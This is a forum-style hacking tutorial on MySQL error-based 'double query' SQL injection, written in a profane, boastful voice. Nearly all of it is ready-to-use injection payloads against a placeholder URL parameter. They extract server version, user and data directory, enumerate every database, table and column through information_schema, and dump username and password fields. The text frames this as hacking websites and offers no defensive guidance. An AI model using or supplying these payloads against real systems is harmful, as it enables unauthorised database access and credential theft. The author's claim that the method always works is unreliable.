Skip to main content

SQL Injection - Double Query - Tutorial

Hey guys,

Okay, so I will be showing you how to apply a Double Query Sql Injection...

So what you have to know is that the stuff you're going to read about here does always works 100 % and am telling you that because I have a 10 years experience hacker so suck it...



Anyways, lets begin:


Some people may be wondering that there's lots of types for Sql Injection but when the fuck am I suppose to use this one and when the fuck I am suppose that one... So yeah, about MySql Double Query Sql Injection you use this method more then once but mostly you use it when you're applying:

Code:

Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,6--

No that's just an example, it can be Union All Select it can be String Injection it can be whatever you want, just, when you do so, it will give you a MySql Error that is similar to the shit in that box down there:

Code:
Mã:
Different Number of Columns

So when this happens don't open Havij or whatever that Gay Tool you love... Use your fucking knowledge...

Anyways, now I will show you the steps and I will try to explain what's happening down there and I will also show you what some People uses and what I use (which is actually, the stuff you should use).


Ok, so now, we got this gay "Different Number of Columns" Error, firstly we say "We don't give a shit" Secondly we begin our attack...


Ok, lets get the boring stuff but they are important:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(version(),user(),@@hostname,0x7e,@@datadir) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now as you can see, this will show you the Version, the User, the Hostname and the Datadir...

Now some people just add "version()" why? I mean why the fuck do you wanna get them one by one when you can get them all together at once...

So whatever happens stick to that code up there and enough with bullshits...


Okay, so now we got these info, now lets get the Databases...

Many many fucking noob people use this in all their Sql Injection not only in Double Query : database()
Well, for these people: do you fucking know that this is gay?
This will only show you only 1 Database... If the Website you're hacking have like 10 database your query is a fucking fail so never use that...

Example for Double Query:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

as you can see, the stuff up there is the gay stuff that most people use... Stop using that please, just fucking stop...

use this one:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Ok let me explain What is this, and what's difference...
As you can see with this Double Query we are retrieving schema_name from information_schema.schemata which means ALL THE DATABASES that can be found...

But in this Double Query example that I am using there's Limits beacuse we are using Concat in place of Group_Concat...

Note: group_concat will group everything all together and all the info will appear at once on the webpage... If you're using Concat you have to use Limit and the info will appear one by one...

So what to do here, you just have to increase the Limit in the first query which is the one that gets us the Databases the one that contains from information_schema.schemata...

How to increase the Limits? Well Limit 0,1 will show you the first Database, Limit 1,1 will show you the second one, Limit 2,1 will show you the thread, Limit 3,1 will show you the fourth, etc...


Note: When you're using the Basic Sql Injection, which means the gayest one on earth your code should be, example:

Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,schema_name,7,8 from information_schema.schemata--

And this will show you ALL THE DATABASES AT ONCE...

but using this gay code:

Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,database(),7,8--

will only show 1 Database...



Ok so now he have all the Databases, lets move on to getting the Tables...

This is what you should use to get the Tables:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Why this one? Firstly because in this one we can choose which Database, same thing, don't use these gay codes that only have database(), if you have about 3 databases you should use this code and if you have one database you won't loose a thing so using this code is always the right thing to do...

Where it says 0xHEX, you should replace that with the HEX of the Database you chose to get it's tables...

Now let me explain a little bit, as you can see we are getting the Table Names from information_schema.tables where table_schema=0xHEX

Which means we're getting the Table Names from the Chosen Database...

Now here you also have Limits so don't forget to increase that or you will only see 1 table...


Now to get the Columns:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x"HEXDATABASE" AND table_name=0x"HEXTABLENAME" LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now here, it's just like getting the tables but we're getting the columns, to get the columns we should also Say from which Table so we just add "And table_name=0xHEXEDTABLENAME"
Surely, you have to put the hex of the Table Name instead of that and Increase the Limits to get all the Columns...


Now lets Retrieve Data from the Columns, that's the good part lol:

So that's the part were the gayness appear from couple of people out there, so I will actually show you how to do it the right way...

Let me first show you what other people use and how gay it is and why...

Some people use this:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast("tablename"."columnname" as char),0x27,0x7e) FROM "databasename"."tablename" LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

So as you can see, the people who uses this code are very detailed but kind of gay... they use tablename.columnname
Why is that weak? firstly no need to write the same thing over and over again because in the same query you're saying which Table when you write databasename.tablename... Secondly this will only show you the data of 1 column? Why? Why don't you see the Data of 14213451234 Columns at a time? It's faster, so stop being fucking stupid...


Now some people use this one:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select concat(username,0x7e,pass,0x7e7e) from "table" limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now this is better, as you can see we are retreiving the Data of more then 1 column at a time which is good but where it says from "table" is the bad thing because you're not precising which Database and you don't want to risk that because what if there's 2 Databases and both of them have the same table name but with different data you will be like owned by yourself...

So here's what to use:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from database.table limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

So why this is better? Firstly because we're getting Data from more then 1 column at once and secondly because we're giving the right details to get the right info by using database.table, so we're just giving it everything the right way...


Some Fucking Stuff you should know:

1- Never forget to increase the limits
2- Sometimes you can use Char instead of Hex if it didn't work but this is very very rare
3- Doing a Sql Injection is simple, you should just understand what you're typing and pretend you're talking to somebody...
4- Don't be stupid


Okay we're done, this took me a while to write and I don't really fucking care if you like it or not but I am pretty sure this will increase your knowledge in a way or another and will get us more members here...

Take care all,

Share this with your friends
Loading...